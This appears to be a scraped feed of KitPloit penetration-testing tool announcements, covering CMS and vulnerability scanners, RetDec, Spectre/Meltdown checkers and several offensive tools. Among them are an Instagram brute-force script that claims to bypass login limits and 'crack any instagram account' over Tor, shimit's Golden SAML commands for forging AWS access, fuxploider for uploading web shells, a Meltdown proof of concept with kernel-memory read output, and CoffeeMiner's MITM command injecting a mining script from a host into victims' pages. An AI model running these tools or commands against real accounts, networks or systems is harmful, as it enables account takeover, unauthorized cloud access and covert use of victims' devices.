Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5854 articles
Browse latest View live

CMSsc4n v2.0 - Tool to identify if a domain is a CMS such as Wordpress, Moodle, Joomla, Drupal or Prestashop

$
0
0

Tool to identify if a domain has got a CMS and determine his version.
At the moment, CMSs supported by CMSsc4n are WordPress, Moodle, Joomla, Drupal and Prestashop.

Instalation
You can download the latest version of CMSmap by cloning the GitHub repository:
 git clone https://github.com/n4xh4ck5/CMSsc4n.git 
Install the dependencies via pip:
 pip install -r requirements.txt 

Usage
python cmssc4n.py -h
usage: cmssc4n.py [-h] [-e EXPORT] [-c CMS] -i INPUT

This tool verifies if the domain is a CMS (Wordpress , Drupal, Joomla, Prestashop or Moodle) and returns the version

optional arguments:
-h, --help show this help message and exit
-e EXPORT, --export EXPORT
File in xlsx format which contains the domains want to know if they are a CMS (y/n)
-c CMS, --cms CMS Identify a CMS: W-Wordpress, J-Joomla, D-Drupal, M-Moodle or P-PrestaShop.Default:All
-i INPUT, --input INPUT
Input in txt o json with the domains which it wants to analyze



Decodify - Detect And Decode Encoded Strings Recursively

$
0
0
Decodify can detect and decode encoded strings, recursively. Its currently in beta phase.
Lets take this string : teamultimate.in and encode it with Hex, URL, Base64 and FromChar encoding, respectively.

Now lets pass this encoded string to Decodify:


Boom! Thats what Decodify does.

Supported Encodings and Encryptions
  • Caesar ciphers
  • Binary
  • Hex
  • Decimal
  • Base64
  • URL
  • FromChar
  • MD5
  • SHA1
  • SHA2

Decoding Caesar Cipher
You can supply the offest by --rot option or you can tell Decodify to decode for 1-20 offest by using --rot all

Installing Decodify
Download Decodify with the following command:
git clone https://github.com/UltimateHackers/Decodify
Now switch to Decodify directory and run the installer with this command:
cd Decodify && chmod +x ./setup.sh
Now you can run decodify by entering dcode in your terminal.


Instagram-Py - Simple Instagram Brute Force Script

$
0
0

Instagram-Py is a simple python script to perform basic brute force attack against Instagram ,
this script can bypass login limiting on wrong passwords , so basically it can test infinite number of passwords.
Instagram-Py is proved and can test over 6M passwords on a single instagram account with less resource as possible
This script mimics the activities of the official instagram android app and sends request over tor so you are secure, but if your tor installation is misconfigured then the blame is on you.
Depends on: python3 , tor , requests , requests[socks] , stem

Installation

using pip to get Instagram-py

Make sure you have got the latest version of pip(>= 9.0 and python(>= 3.6)
$ sudo easy_install3 -U pip # you have to install python3-setuptools , update pip
$ sudo pip3 install requests --upgrade
$ sudo pip3 install requests[socks]
$ sudo pip3 install stem
$ sudo pip3 install instagram-py
$ instagram-py # installed successfully
$ # Now lets copy the config file to your hard drive!
$ wget -O ~/instapy-config.json "https://git.io/v5DGy"


Configuring Instagram-Py
Open your configuration file found in your home directory , this file is very important located at ~/instapy-config.json , do not change anything except tor configuration
$ vim ~/instapy-config.json # open it with your favorite text editior!
The configuration file looks like this
{
"api-url" : "https://i.instagram.com/api/v1/",
"user-agent" : "Instagram 10.26.0 Android (18/4.3; 320dp..... ",
"ig-sig-key" : "4f8732eb9ba7d1c8e8897a75d6474d4eb3f5279137431b2aafb71fafe2abe178",
"ig-sig-version" : "4",
"tor" : {
"server" : "127.0.0.1",
"port" : "9050",
"protocol" : "socks5",
"control" : {
"password" : "",
"port" : "9051"
}
}

}
api-url : do not change this unless you know what you are doing
user-agent : do not change this unless you know your stuff
ig-sig_key : never change this unless new release, this is extracted from the instagram apk file
tor : change everything according to your tor server configuration , do not mess up!


Configuring Tor server to open control port
open your tor configuration file usually located at /etc/tor/torrc
$ sudo vim /etc/tor/torrc # open it with your text editor
search for the file for this specific section
## The port on which Tor will listen for local connections from Tor
## controller applications, as documented in control-spec.txt.
#ControlPort 9051
uncomment 'ControlPort' by deleting the # before 'ControlPort' , now save the file and restart your tor server
now you are ready to crack any instagram account , make sure your tor configuration matched ~/instapy-config.json


Usage
Finally , now you can use instagram-py!
$ instagram-py your_account_username path_to_password_list



Reposcanner - Python Script To Scan Git Repos For Interesting Strings

$
0
0

Reposcanner is a python script to search through the commit history of Git repositories looking for interesting strings such as API keys, inspires by truffleHog.

Installation
The python Git module is required (python-git on Debian).

Usage
./reposcanner -r <repository>
Options:
optional arguments:
-h, --help show this help message and exit
-r REPO, --repo REPO Repo to scan
-c COUNT, --count COUNT Number of commits to scan (default 500)
-e ENTROPY, --entropy ENTROPY Minimum entropy to report (default 4.3)
-l LENGTH, --length LENGTH Maxmimum line length (default 500)
-a, --all-branches Scan all branches
-b BRANCH, --branch BRANCH Scan a specific branch
-v, --verbose Verbose output
Example:
./reposcanner.py -r https://github.com/Dionach/reposcanner -v -a -c 30


RetDec - A Retargetable Machine-Code Decompiler

$
0
0

RetDec is a retargetable machine-code decompiler based on LLVM.
The decompiler is not limited to any particular target architecture, operating system, or executable file format:
  • Supported file formats: ELF, PE, Mach-O, COFF, AR (archive), Intel HEX, and raw machine code.
  • Supported architectures (32b only): Intel x86, ARM, MIPS, PIC32, and PowerPC.

Features:
  • Static analysis of executable files with detailed information.
  • Compiler and packer detection.
  • Loading and instruction decoding.
  • Signature-based removal of statically linked library code.
  • Extraction and utilization of debugging information (DWARF, PDB).
  • Reconstruction of instruction idioms.
  • Detection and reconstruction of C++ class hierarchies (RTTI, vtables).
  • Demangling of symbols from C++ binaries (GCC, MSVC, Borland).
  • Reconstruction of functions, types, and high-level constructs.
  • Integrated disassembler.
  • Output in two high-level languages: C and a Python-like language.
  • Generation of call graphs, control-flow graphs, and various statistics.
For more information, check out our

Installation and Use
Currently, we support only Windows (7 or later), Linux, and unofficially macOS.
Warning: Decompilations of larger binaries (1 MB or more) may require a lot of RAM. When running decompilations, we advise you to limit the maximal virtual memory for processes before decompiling to prevent potential swapping and unresponsiveness. On Linux, you can run e.g. ulimit -Sv 9863168 in your shell to limit the maximal virtual memory to 8 GB.

Windows
  1. Either download and unpack a pre-built package from the following list, or build and install the decompiler by yourself (the process is described below):
  2. Install Microsoft Visual C++ Redistributable for Visual Studio 2015.
  3. Install MSYS2 and other needed applications by following RetDec's Windows environment setup guide.
  4. Now, you are all set to run the decompiler. To decompile a binary file named test.exe, go into $RETDEC_INSTALL_DIR/bin and run:
    bash decompile.sh test.exe
    For more information, run bash decompile.sh --help.

Linux
  1. There are currently no pre-built packages for Linux. You will have to build and install the decompiler by yourself. The process is described below.
  2. After you have built the decompiler, you will need to install the following packages via your distribution's package manager:
  3. Now, you are all set to run the decompiler. To decompile a binary file named test.exe, go into $RETDEC_INSTALL_DIR/bin and run:
    ./decompile.sh test.exe
    For more information, run ./decompile.sh --help.

macOS
Warning: macOS build was added based on community feedback and is not directly supported by the RetDec team. We do not guarantee you that these instructions will work for you. If you encounter any problem with your build, submit an issue so the macOS community can help you out.
  1. There are currently no pre-built packages for macOS. You will have to build and install the decompiler by yourself. The process is described below.
  2. After you have built the decompiler, you will need to install the following packages:
  3. Now, you are all set to run the decompiler. To decompile a binary file named test.exe, go into $RETDEC_INSTALLED_DIR/bin and run:
    # /usr/local/bin/bash if installed via Homebrew
    /path/to/gnu/bash ./decompile.sh test.exe
    For more information, run ./decompile.sh --help.

Build and Installation
This section describes a manual build and installation of RetDec.

Requirements

Linux
On Debian-based distributions (e.g. Ubuntu), the required packages can be installed with apt-get:
sudo apt-get install build-essential cmake git perl python3 bash coreutils wget bc doxygen graphviz upx flex bison zlib1g-dev libtinfo-dev autoconf automake pkg-config m4 libtool
On RPM-based distributions (e.g. Fedora), the required packages can be installed with dnf:
sudo dnf install git cmake make gcc gcc-c++ perl python3 bash zlib-devel flex bison m4 coreutils autoconf automake libtool ncurses-devel wget bc doxygen graphviz upx pkg-config
On Arch Linux, the required packages can be installed with pacman:
sudo pacman -S base-devel cmake git perl python3 bash coreutils wget bc doxygen graphviz upx flex bison zlib ncurses autoconf automake pkg-config m4 libtool

Windows
  • Microsoft Visual C++ (version >= Visual Studio 2015 Update 2)
  • Git
  • MSYS2 and some other applications. Follow RetDec's Windows environment setup guide to get everything you need on Windows.
  • Active Perl. It needs to be the first Perl in PATH, or it has to be provided to CMake using CMAKE_PROGRAM_PATH variable, e.g. -DCMAKE_PROGRAM_PATH=/c/perl/bin.
  • Python (version >= 3.4)

macOS
  • Full Xcode installation (Command Line Tools are untested)
  • CMake (version >= 3.6)
  • Newer versions of Bison and Flex, preferably installed via Homebrew
  • wget
  • Python (version >= 3.4, macOS has 2.7)

Process
Warning: Currently, RetDec has to be installed into a clean, dedicated directory. Do NOT install it into /usr, /usr/local, etc. because our build system is not yet ready for system-wide installations. So, when running cmake, always set -DCMAKE_INSTALL_PREFIX=<path> to a directory that will be used just by RetDec. For more details, see #12.
  • Recursively clone the repository (it contains submodules):
    • git clone --recursive https://github.com/avast-tl/retdec
  • Linux:
    • cd retdec
    • mkdir build && cd build
    • cmake .. -DCMAKE_INSTALL_PREFIX=<path>
    • make && make install
  • Windows:
    • Open MSBuild command prompt, or any terminal that is configured to run the msbuild command.
    • cd retdec
    • mkdir build && cd build
    • cmake .. -DCMAKE_INSTALL_PREFIX=<path> -G<generator>
    • msbuild /m /p:Configuration=Release retdec.sln
    • msbuild /m /p:Configuration=Release INSTALL.vcxproj
    • Alternatively, you can open retdec.sln generated by cmake in Visual Studio IDE.
  • macOS:
    • cd retdec
    • mkdir build && cd build
    • # Apple ships old Flex & Bison, so Homebrew versions should be used.
      export CMAKE_INCLUDE_PATH="/usr/local/opt/flex/include"
      export CMAKE_LIBRARY_PATH="/usr/local/opt/flex/lib;/usr/local/opt/bison/lib"
      export PATH="/usr/local/opt/flex/bin:/usr/local/opt/bison/bin:$PATH"
    • cmake .. -DCMAKE_INSTALL_PREFIX=<path>
    • make && make install
You have to pass the following parameters to cmake:
  • -DCMAKE_INSTALL_PREFIX=<path> to set the installation path to <path>.
  • (Windows only) -G<generator> is -G"Visual Studio 14 2015" for 32-bit build using Visual Studio 2015, or -G"Visual Studio 14 2015 Win64" for 64-bit build using Visual Studio 2015. Later versions of Visual Studio may be used.
You can pass the following additional parameters to cmake:
  • -DRETDEC_DOC=ON to build with API documentation (requires Doxygen and Graphviz, disabled by default).
  • -DRETDEC_TESTS=ON to build with tests, including all the tests in dependency submodules (disabled by default).
  • -DCMAKE_BUILD_TYPE=Debug to build with debugging information, which is useful during development. By default, the project is built in the Release mode. This has no effect on Windows, but the same thing can be achieved by running msbuild with the /p:Configuration=Debug parameter.
  • -DCMAKE_PROGRAM_PATH=<path> to use Perl at <path> (probably useful only on Windows).

Repository Overview
This repository contains the following libraries:
  • bin2llvmir -- library of LLVM passes for translating binaries into LLVM IR modules.
  • debugformat -- library for uniform representation of DWARF and PDB debugging information.
  • dwarfparser -- library for high-level representation of DWARF debugging information.
  • llvm-support -- set of LLVM related utility functions.
  • llvmir2hll -- library for translating LLVM IR modules to high-level source codes (C, Python-like language).
This repository contains the following tools:
  • bin2llvmirtool -- frontend for the bin2llvmir library.
  • llvm2hlltool -- frontend for the llvmir2hll library.
This repository contains the following scripts:
  • decompile.sh -- the main decompilation script binding it all together. This is the tool to use for full binary-to-C decompilations.
  • Support scripts used by decompile.sh:
    • color-c.py -- decorates output C sources with IDA color tags -- syntax highlighting for IDA.
    • config.sh -- decompiler's configuration file.
    • decompile-archive.sh -- decompiles objects in the given AR archive.
    • fileinfo.sh -- a Fileinfo tool wrapper.
    • signature-from-library.sh -- extracts function signatures from the given library.
    • unpack.sh -- tries to unpack the given executable file by using any of the supported unpackers.
  • Other utility scripts:
    • decompile-all.sh -- decompiles all executables in the given directory and subdirectories.
    • run-unit-test.sh -- run all tests in the unit test directory.
    • utils.sh -- a collection of bash utilities.

Related Repositories
  • retdec-idaplugin -- embeds RetDec into IDA (Interactive Disassembler) and makes its use much easier.
  • retdec-regression-tests-framework -- provides means to run and create regression tests for RetDec and related tools. This is a must if you plan to contribute to the RetDec project.
  • retdec-python -- Python library and tools providing easy access to our online decompilation service through its REST API.
  • vim-syntax-retdecdsm -- Vim syntax-highlighting file for the output from the RetDec's disassembler (.dsm files).


shimit - A tool that implements the Golden SAML attack

$
0
0

shimit is a python tool that implements the Golden SAML attack. More informations on this can be found in the following article on our blog.
python .\shimit.py -h
usage: shimit.py [-h] -pk KEY [-c CERT] [-sp SP] -idp IDP -u USER [-reg REGION]
[--SessionValidity SESSION_VALIDITY] [--SamlValidity SAML_VALIDITY] -n SESSION_NAME
-r ROLES -id ARN [-o OUT_FILE] [-l LOAD_FILE] [-t TIME]

██╗ ███████╗██╗ ██╗██╗███╗ ███╗██╗████████╗ ██╗ ██╗
██╔╝ ██╔════╝██║ ██║██║████╗ ████║██║╚══██╔══╝ ██╔╝ ╚██╗
██╔╝ ███████╗███████║██║██╔████╔██║██║ ██║ ██╔╝ ╚██╗
╚██╗ ╚════██║██╔══██║██║██║╚██╔╝██║██║ ██║ ██╔╝ ██╔╝
╚██╗ ███████║██║ ██║██║██║ ╚═╝ ██║██║ ██║ ██╔╝ ██╔╝
╚═╝ ╚══════╝╚═╝ ╚═╝╚═╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═╝

Overview
In a golden SAML attack, attackers can gain access to an application (any application that supports SAML authentication) with any privileges they desire and be any user on the targeted application.
shimit allows the user to create a signed SAMLResponse object, and use it to open a session in the Service Provider. shimit now supports AWS Console as a Service Provider, more are in the works...

AWS
After generating and signing the SAMLResponse's assertion, shimit will call the AssumeRoleWithSAML() API in AWS. Then, the session token and key will be applied to a new session, where the user can use aws cli to perform action using the permissions obtained using the golden SAML.

Requirements:
For installing the required modules, run the following command:
python -m pip install boto3 botocore defusedxml enum python_dateutil lxml signxml

AWS cli
Needs to be installed in order to use the credentials obtained. Can be downloaded for Windows or Linux from these links.

Usage:

Apply session for AWS cli
python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file
-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012
idp - Identity Provider URL e.g. http://server.domain.com/adfs/services/trust
pk - Private key file full path (pem format)
c - Certificate file full path (pem format)
u - User and domain name e.g. domain\username (use \ or quotes in *nix)
n - Session name in AWS
r - Desired roles in AWS. Supports Multiple roles, the first one specified will be assumed.
id - AWS account id e.g. 123456789012

Save SAMLResponse to file
python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file
-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012 -o saml_response.xml
o - Output encoded SAMLResponse to a specified file path

Load SAMLResponse from file
python .\shimit.py -l saml_response.xml
l - Load SAMLResponse from a specified file path

Contributions
shimit supports AWS as a service provider at the moment, as a POC. We highly encourage you to conribute with a new modules for other service providers.


fuxploider - File Upload Vulnerability Scanner And Exploitation Tool

$
0
0

fuxploider is an open source penetration testing tool that automates the process of detecting and exploiting file upload forms flaws. This tool is able to detect the file types allowed to be uploaded and is able to detect which technique will work best to upload web shells or any malicious file on the desired web server.

Installation
git clone https://github.com/almandin/fuxploider.git
cd fuxploider
pip3 install -r requirements.txt

Usage
To get a list of basic options and switches use :
python fuxploider.py -h
Basic example :
python fuxploider.py --url https://awesomeFileUploadService.com --not-regex "wrong file type"


In-Spectre-Meltdown - Tool to identify Meltdown & Spectre Vulnerabilities in processors

$
0
0


This tool allows to check speculative execution side-channel attacks that affect many modern processors and operating systems designs. CVE-2017-5754 (Meltdown) and CVE-2017-5715 (Spectre) allows unprivileged processes to steal secrets from privileged processes. These attacks present 3 different ways of attacking data protection measures on CPUs enabling attackers to read data they shouldn't be able to.




Please note:
This solution has been tested successfully using Python 3.6.3 & PowerShell version 5.1.

How do I use this?
  • Run the python code or download the executable from the releases section and run it as an administrator user.
  • Press Number 1, 2, 3 & 4 in sequence to see the results.
  • Press 1: Sets the execution policy to unrestricted.
  • Press 2: Imports necessary PowerShell modules
  • Press 3: Installs Spectre related modules within PowerShell
  • Press 4: Inspects control settings for Spectre & Meltdown and displays result
  • Press 5: Exit from the program

Do I need to run the executable as administrator?
  • Yes, Right click on the "In-Spectre_meltdown.exe" and run as administrator to get the results.

Questions?
Twitter: https://twitter.com/maniarviral
LinkedIn: https://au.linkedin.com/in/viralmaniar



Meltdown Exploit PoC

$
0
0

Speculative optimizations execute code in a non-secure manner leaving data traces in microarchitecture such as cache.

Refer to the paper by Lipp et. al 2017 for details: https://meltdownattack.com/meltdown.pdf.

Can only dump linux_proc_banner at the moment, since requires accessed memory to be in cache and linux_proc_banner is cached on every read from /proc/version. Might work with prefetch.
Build with make, run with ./run.sh.

Can't defeat KASLR yet, so you may need to enter your password to find linux_proc_banner in the /proc/kallsyms (or do it manually).

Flush+Reload and target array approach taken from spectre paper https://spectreattack.com/spectre.pdf implemented following clues from https://cyber.wtf/2017/07/28/negative-result-reading-kernel-memory-from-user-mode/.
Pandora's box is open.

Result:
$ make
cc -O2 -msse2 -c -o meltdown.o meltdown.c
cc meltdown.o -o meltdown
$ ./run.sh
looking for linux_proc_banner in /proc/kallsyms
protected. requires root
+ find_linux_proc_banner /proc/kallsyms sudo
+ sudo awk
/linux_proc_banner/ {
if (strtonum("0x"$1))
print $1;
exit 0;
} /proc/kallsyms
+ linux_proc_banner=ffffffffa3e000a0
+ set +x
cached = 29, uncached = 271, threshold 88
read ffffffffa3e000a0 = 25 %
read ffffffffa3e000a1 = 73 s
read ffffffffa3e000a2 = 20
read ffffffffa3e000a3 = 76 v
read ffffffffa3e000a4 = 65 e
read ffffffffa3e000a5 = 72 r
read ffffffffa3e000a6 = 73 s
read ffffffffa3e000a7 = 69 i
read ffffffffa3e000a8 = 6f o
read ffffffffa3e000a9 = 6e n
read ffffffffa3e000aa = 20
read ffffffffa3e000ab = 25 %
read ffffffffa3e000ac = 73 s
read ffffffffa3e000ad = 20
read ffffffffa3e000ae = 28 (
read ffffffffa3e000af = 62 b
read ffffffffa3e000b0 = 75 u
read ffffffffa3e000b1 = 69 i
read ffffffffa3e000b2 = 6c l
read ffffffffa3e000b3 = 64 d
read ffffffffa3e000b4 = 64 d
read ffffffffa3e000b5 = 40 @
VULNERABLE
VULNERABLE ON
4.10.0-42-generic #46~16.04.1-Ubuntu SMP Mon Dec 4 15:57:59 UTC 2017 x86_64
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 158
model name : Intel(R) Core(TM) i7-7700HQ CPU @ 2.80GHz
stepping : 9
microcode : 0x5e
cpu MHz : 3499.316
cache size : 6144 KB
physical id : 0

Does not work
If it compiles but fails with Illegal instruction then either your hardware is very old or it is a VM. Try compiling with:
$ make CFLAGS=-DHAVE_RDTSCP=0 clean all

Works on
The CPUs list is moved here: https://github.com/paboldin/meltdown-exploit/issues/19


Spectre-Meltdown-Checker - Spectre & Meltdown Vulnerability/Mitigation Checker For Linux

$
0
0

A simple shell script to tell if your Linux installation is vulnerable against the 3 "speculative execution" CVEs:

CVE-2017-5753 bounds check bypass (Spectre Variant 1)
  • Impact: Kernel & all software
  • Mitigation: recompile software and kernel with a modified compiler that introduces the LFENCE opcode at the proper positions in the resulting code
  • Performance impact of the mitigation: negligible

CVE-2017-5715: branch target injection (Spectre Variant 2)
  • Impact: Kernel
  • Mitigation 1: new opcode via microcode update that should be used by up to date compilers to protect the BTB (by flushing indirect branch predictors)
  • Mitigation 2: introducing "retpoline" into compilers, and recompile software/OS with it
  • Performance impact of the mitigation: high for mitigation 1, medium for mitigation 2, depending on your CPU

CVE-2017-5754: rogue data cache load (Meltdown)
  • Impact: Kernel
  • Mitigation: updated kernel (with PTI/KPTI patches), updating the kernel is enough
  • Performance impact of the mitigation: low to medium
Example of the output of the script:
$ sudo ./spectre-meltdown-checker.sh
Spectre and Meltdown mitigation detection tool v0.09

CVE-2017-5753 [bounds check bypass] aka 'Spectre Variant 1'
* Kernel compiled with LFENCE opcode inserted at the proper places: NO (only 38 opcodes found, should be >= 60)
> STATUS: VULNERABLE

CVE-2017-5715 [branch target injection] aka 'Spectre Variant 2'
* Mitigation 1
* Hardware (CPU microcode) support for mitigation: NO
* Kernel support for IBRS: NO
* IBRS enabled for Kernel space: NO
* IBRS enabled for User space: NO
* Mitigation 2
* Kernel compiled with retpolines: NO
> STATUS: VULNERABLE (IBRS hardware + kernel support OR kernel with retpolines are needed to mitigate the vulnerability)

CVE-2017-5754 [rogue data cache load] aka 'Meltdown' aka 'Variant 3'
* Kernel supports Page Table Isolation (PTI): YES
* PTI enabled and active: YES
> STATUS: NOT VULNERABLE (PTI mitigates the vulnerability)


Wapiti 3.0.0 - The Web-Application Vulnerability Scanner

$
0
0

Wapiti allows you to audit the security of your websites or web applications.
It performs "black-box" scans (it does not study the source code) of the web application by crawling the webpages of the deployed webapp, looking for scripts and forms where it can inject data.

Once it gets the list of URLs, forms and their inputs, Wapiti acts like a fuzzer, injecting payloads to see if a script is vulnerable.

What's new in Wapiti 3.0.0 ?

Wapiti can detect the following vulnerabilities :
  • File disclosure (Local and remote include/require, fopen, readfile...)
  • Database Injection (PHP/JSP/ASP SQL Injections and XPath Injections)
  • XSS (Cross Site Scripting) injection (reflected and permanent)
  • Command Execution detection (eval(), system(), passtru()...)
  • CRLF Injection (HTTP Response Splitting, session fixation...)
  • XXE (XML External Entity) injection
  • Use of know potentially dangerous files (thanks to the Nikto database)
  • Weak .htaccess configurations that can be bypassed
  • Presence of backup files giving sensitive information (source code disclosure)
  • Shellshock (aka Bash bug)
A buster module also allows to brute force directories and files names on the target webserver.

Wapiti supports both GET and POST HTTP methods for attacks.
It also supports multipart forms and can inject payloads in filenames (upload).
Warnings are raised when an anomaly is found (for example 500 errors and timeouts)
Wapiti is able to make the difference beetween permanent and reflected XSS vulnerabilities.


General features :
  • Generates vulnerability reports in various formats (HTML, XML, JSON, TXT...)
  • Can suspend and resume a scan or an attack (session mechanism using sqlite3 databases)
  • Can give you colors in the terminal to highlight vulnerabilities
  • Different levels of verbosity
  • Fast and easy way to activate/deactivate attack modules
  • Adding a payload can be as easy as adding a line to a text file

Browsing features:
  • Support HTTP, HTTPS and SOCKS5 proxies
  • Authentication via several methods : Basic, Digest, Kerberos or NTLM
  • Ability to restrain the scope of the scan (domain, folder, page, url)
  • Automatic removal of one are more parameters in URLs
  • Multiple safeguards against scan endless-loops (ifor example, limit of values for a parameter)
  • Possibility to set the first URLs to explore (even if not in scope)
  • Can exclude some URLs of the scan and attacks (eg: logout URL)
  • Import of cookies (get them with the wapiti-getcookie tool)
  • Can activate / deactivate SSL certificates verification
  • Extract URLs from Flash SWF files
  • Try to extract URLs from javascript (very basic JS interpreter)
  • HTML5 aware (understand recent HTML tags)
  • Several options to control the crawler behavior and limits.
  • Skipping some parameter names during attack.
  • Setting a maximum time for the scan process.
  • Adding some custom HTTP headers or setting a custom User-Agent.

Wapiti is a command-line application.
Here is an exemple of output against a vulnerable web application.
You may find some useful informations in the README and the INSTALL files.
Have any questions ? You may find answers in the FAQ

Usage

██╗    ██╗ █████╗ ██████╗ ██╗████████╗██╗██████╗ 
██║ ██║██╔══██╗██╔══██╗██║╚══██╔══╝██║╚════██╗
██║ █╗ ██║███████║██████╔╝██║ ██║ ██║ █████╔╝
██║███╗██║██╔══██║██╔═══╝ ██║ ██║ ██║ ╚═══██╗
╚███╔███╔╝██║ ██║██║ ██║ ██║ ██║██████╔╝
╚══╝╚══╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═╝╚═════╝
Wapiti-3.0.0 (wapiti.sourceforge.net)
usage: wapiti [-h] [-u URL] [--scope {page,folder,domain,url}]
[-m MODULES_LIST] [--list-modules] [-l LEVEL] [-p PROXY_URL]
[-a CREDENTIALS] [--auth-type {basic,digest,kerberos,ntlm}]
[-c COOKIE_FILE] [--skip-crawl] [--resume-crawl]
[--flush-attacks] [--flush-session] [-s URL] [-x URL]
[-r PARAMETER] [--skip PARAMETER] [-d DEPTH]
[--max-links-per-page MAX] [--max-files-per-dir MAX]
[--max-scan-time MINUTES] [--max-parameters MAX] [-S FORCE]
[-t SECONDS] [-H HEADER] [-A AGENT] [--verify-ssl {0,1}]
[--color] [-v LEVEL] [-f FORMAT] [-o OUPUT_PATH]
[--no-bugreport] [--version]
wapiti: error: one of the arguments -u/--url --list-modules is required

Shortest way (with default options) to launch a Wapiti scan :
wapiti -u http://target/

Every option is detailed in the wapiti(1) manpage.
Wapiti also comes with an utility to fetch cookies from websites called wapiti-getcookie. The corresponding manpage is here.


CoffeeMiner - Collaborative (MITM) Cryptocurrency Mining Pool In Wifi Networks

$
0
0

Collaborative (mitm) cryptocurrency mining pool in wifi networks
Warning: this project is for academic/research purposes only.
A blog post about this project can be read here: http://arnaucode.com/blog/coffeeminer-hacking-wifi-cryptocurrency-miner.html

Concept
  • Performs a MITM attack to all selected victims
  • Injects a js script in all the HTML pages requested by the victims
  • The js script injected contains a cryptocurrency miner
  • All the devices victims connected to the Lan network, will be mining for the CoffeeMiner

Use
  • install.sh
bash install.sh
  • edit victims.txt with one IP per line
  • edit coffeeMiner.py, line 28, with the coffeeMiner httpserver IP:
os.system("~/.local/bin/mitmdump -s 'injector.py http://10.0.2.20:8000/script.js' -T")
  • execute coffeeMiner.py
python3 coffeeMiner.py ipgateway



A complete instructions for academic scenario can be found in https://github.com/arnaucode/coffeeMiner/blob/master/virtualbox_scenario_instructions.md



Anubis - Subdomain Enumeration And Information Gathering Tool

$
0
0

Anubis is a subdomainenumeration and information gathering tool. Anubis collates data from a variety of sources, including HackerTarget, DNSDumpster, x509 certs, VirusTotal, Google, Pkey, and NetCraft. Anubis also has a sister project, AnubisDB, which serves as a centralized repository of subdomains. Subdomains are automatically sent to AnubisDB - to disable this functionality, pass the d flag when running Anubis.

Getting Started

Prerequisites
  • Nmap
If you are running Linux, the following are also required:
sudo apt-get install python3-pip python-dev libssl-dev libffi-dev

Installing
Note: Python 3.6 is required
pip3 install anubis-netsec

Install From Source
Please note Anubis is still in beta.
git clone git@github.com:jonluca/Anubis.git
cd Anubis
pip3 install -r requirements.txt
pip3 install .

Other Notes
If you have both python3 and python2 installed on your system, you might have to replace all instances of pip to pip3 in the commands below.
If running on Linux distros, openssl and python dev will be required as well, witch
sudo apt-get install python3-pip python-dev libssl-dev libffi-dev


Usage
Usage:
anubis -t TARGET [-o FILENAME] [-noispbdrv] [-w SCAN] [-q NUM]
anubis -h
anubis --version

Options:
-h --help show this help message and exit
-t --target set target (comma separated, no spaces, if multiple)
-n --with-nmap perform an nmap service/script scan
-o --output save to filename
-i --additional-info show additional information about the host from Shodan (requires API key)
-s --ssl run an ssl scan and output cipher + chain info
-p --ip outputs the resolved IPs for each subdomain, and a full list of unique ips
-b --brute-force attempts to use a common word list to find subdomains (usually not very succesful)
-d --no-anubis-db don't send to or receive from anubisdb
-r --recursive recursively search over all subdomains
-w --overwrite-nmap-scan SCAN overwrite default nmap scan (default -nPn -sV -sC)
-v --verbose print debug info and full request output
-q --queue-workers NUM override number of queue workers (default: 10, max: 100)
--version show version and exit

Help:
For help using this tool, please open an issue on the Github repository:
https://github.com/jonluca/anubis

Basic

Common Use Case
anubis -tip domain.com -o out.txt

Set's target to domain.com, outputs additional information like server and ISP or server hosting provider, then attempts to resolve all URLs and outputs list of unique IPs. Finally, writes all results to out.txt.

Other
anubis -t reddit.com
Simplest use of Anubis, just runs subdomain enumeration
Searching for subdomains for 151.101.65.140 (reddit.com)

Testing for zone transfers
Searching for Subject Alt Names
Searching HackerTarget
Searching VirusTotal
Searching Pkey.in
Searching NetCraft.com
Searching crt.sh
Searching DNSDumpster
Searching Anubis-DB
Found 193 subdomains
----------------
fj.reddit.com
se.reddit.com
gateway.reddit.com
beta.reddit.com
ww.reddit.com
... (truncated for readability)
Sending to AnubisDB
Subdomain search took 0:00:20.390
anubis -t reddit.com -ip
(equivalent to anubis -t reddit.com --additional-info --ip) - resolves IPs and outputs list of uniques, and provides additional information through https://shodan.io
Searching for subdomains for 151.101.65.140
Server Location: San Francisco US - 94107
ISP: Fastly
Found 27 domains
----------------
http://www.np.reddit.com: 151.101.193.140
http://nm.reddit.com: 151.101.193.140
http://ww.reddit.com: 151.101.193.140
http://dg.reddit.com: 151.101.193.140
http://en.reddit.com: 151.101.193.140
http://ads.reddit.com: 151.101.193.140
http://zz.reddit.com: 151.101.193.140
out.reddit.com: 107.23.11.190
origin.reddit.com: 54.172.97.226
http://blog.reddit.com: 151.101.193.140
alb.reddit.com: 52.201.172.48
http://m.reddit.com: 151.101.193.140
http://rr.reddit.com: 151.101.193.140
reddit.com: 151.101.65.140
http://www.reddit.com: 151.101.193.140
mx03.reddit.com: 151.101.193.140
http://fr.reddit.com: 151.101.193.140
rhs.reddit.com: 54.172.97.229
http://np.reddit.com: 151.101.193.140
http://nj.reddit.com: 151.101.193.140
http://re.reddit.com: 151.101.193.140
http://iy.reddit.com: 151.101.193.140
mx02.reddit.com: 151.101.193.140
mailp236.reddit.com: 151.101.193.140
Found 6 unique IPs
52.201.172.48
151.101.193.140
107.23.11.190
151.101.65.140
54.172.97.226
54.172.97.229
Execution took 0:00:04.604

Advanced
anubis -t reddit.com --with-nmap -o temp.txt -is --overwrite-nmap-scan "-F -T5"

Searching for subdomains for 151.101.65.140 (reddit.com)

Testing for zone transfers
Searching for Subject Alt Names
Searching HackerTarget
Searching VirusTotal
Searching Pkey.in
Searching NetCraft.com
Searching crt.sh
Searching DNSDumpster
Searching Anubis-DB
Running SSL Scan
Available TLSv1.0 Ciphers:
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
TLS_RSA_WITH_AES_256_CBC_SHA
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
TLS_RSA_WITH_AES_128_CBC_SHA
TLS_RSA_WITH_3DES_EDE_CBC_SHA
Available TLSv1.2 Ciphers:
TLS_RSA_WITH_AES_256_CBC_SHA
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
